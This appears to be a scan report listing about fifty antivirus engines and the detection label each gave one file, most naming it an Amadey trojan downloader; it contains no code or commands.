1 1 0
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Generic.4!c
DrWeb Trojan.Siggen20.65496
MicroWorld-eScan Gen:Variant.Zusy.446510
ClamAV Win.Malware.Doina-10001799-0
FireEye Generic.mg.3dd072d71907f6d5
ALYac Gen:Variant.Zusy.446510
Malwarebytes Malware.AI.1627801230
VIPRE Gen:Variant.Zusy.446510
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan-Downloader ( 0057994f1 )
Alibaba TrojanDownloader:Win32/Amadey.a00606fe
K7GW Trojan-Downloader ( 0057994f1 )
CrowdStrike win/malicious_confidence_100% (W)
Arcabit Trojan.Zusy.D6D02E
BitDefenderTheta Gen:NN.ZexaF.36270.ouW@aWGuoNki
Cyren W32/Amadey.C1.gen!Eldorado
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win32/TrojanDownloader.Amadey.A
APEX Malicious
Cynet Malicious (score: 100)
Kaspersky HEUR:Trojan-Downloader.Win32.Deyma.gen
BitDefender Gen:Variant.Zusy.446510
Avast Win32:BotX-gen [Trj]
Tencent Win32.Trojan.Agen.Njgl
Emsisoft Gen:Variant.Zusy.446510 (B)
F-Secure Heuristic.HEUR/AGEN.1319380
TrendMicro Trojan.Win32.AMADEY.YXDFXZ
McAfee-GW-Edition BehavesLike.Win32.Generic.dh
Sophos Mal/Generic-R
SentinelOne Static AI - Malicious PE
Avira HEUR/AGEN.1319380
MAX malware (ai score=85)
Gridinsoft Trojan.Win32.Amadey.bot
Microsoft Trojan:Win32/Amadey.GJU!MTB
ZoneAlarm HEUR:Trojan-Downloader.Win32.Deyma.gen
GData Win32.Trojan-Downloader.Amadey.LXCUSU
Google Detected
AhnLab-V3 Malware/Win.Trojanspy.C5238800
McAfee Downloader-FCND!3DD072D71907
Cylance unsafe
Panda Trj/GdSda.A
TrendMicro-HouseCall Trojan.Win32.AMADEY.YXDFXZ
Rising Trojan.Generic@AI.100 (RDML:nsu7q1pN70IgBYqlEu3h2Q)
Ikarus Trojan-Downloader.Win32.Amadey
MaxSecure Trojan.Malware.300983.susgen
Fortinet W32/Injector.EGTS!tr
AVG Win32:BotX-gen [Trj]
Cybereason malicious.71907f